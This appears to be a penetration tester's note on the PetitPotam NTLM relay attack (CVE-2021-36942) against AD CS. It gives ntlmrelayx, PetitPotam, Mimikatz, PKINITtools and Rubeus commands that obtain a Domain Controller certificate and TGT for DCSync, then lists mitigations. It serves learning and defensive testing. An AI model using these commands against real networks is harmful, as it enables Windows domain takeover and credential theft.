PetitPotam (CVE-2021-36942) is an LSA spoofing vulnerability that was patched in August of 2021. The flaw allows an unauthenticated attacker to coerce a Domain Controller to authenticate against another host using NTLM over port 445 via the Local Security Authority Remote Protocol (LSARPC) by abusing Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC). This technique allows an unauthenticated attacker to take over a Windows domain where Active Directory Certificate Services (AD CS) is in use.

In the attack, an authentication request from the targeted Domain Controller is relayed to the Certificate Authority (CA) host's Web Enrollment page and makes a Certificate Signing Request (CSR) for a new digital certificate. This certificate can then be used with a tool such as Rubeus or gettgtpkinit.py from PKINITtools to request a TGT for the Domain Controller, which can then be used to achieve domain compromise via a DCSync attack.

Attack

Initial Exploit

We start by setting up the NTLM Relay.

sudo ntlmrelayx.py -debug -smb2support --target http://<ca-hostname>/certsrv/certfnsh.asp --adcs --template DomainController

Now we can run PetitPotam.py. 

pytho3n PetitPotam.py <atk-ip> <dc-ip>

We can also do this step using [[Mimikatz]] on a Windows host.

misc::efs /server:<dc-ip> /connect:<atk-ip>

Getting TGT

If all goes well, we get hold of the Base64-encoded certificate of the Domain Controller.

Linux

We can use this to request a TGT using gettgtpkinit.py

python3 /opt/PKINITtools/gettgtpkinit.py <domain>\<DC-name>$ -pfx-base64 <b64> dc01.ccache

We can then set the KRB5CCNAME environment variable to this .ccache for future auth.

export KRB5CCNAME=dc01.ccache

We can then do pretty much whatever we want including a [[DCSync]] attack!

Windows

We can use [[Rubeus]] for to request a TGT using the certificate as well.

.\Rubeus.exe asktgt /user:<domain> /certificate<b64-blob> /ptt

Mitigations

First off, the patch for CVE-2021-36942 should be applied to any affected hosts. Below are some further hardening steps that can be taken:

  • To prevent NTLM relay attacks, use Extended Protection for Authentication along with enabling Require SSL to only allow HTTPS connections for the Certificate Authority Web Enrollment and Certificate Enrollment Web Service services
  • Disabling NTLM authentication for Domain Controllers
  • Disabling NTLM on AD CS servers using Group Policy
  • Disabling NTLM for IIS on AD CS servers where the Certificate Authority Web Enrollment and Certificate Enrollment Web Service services are in use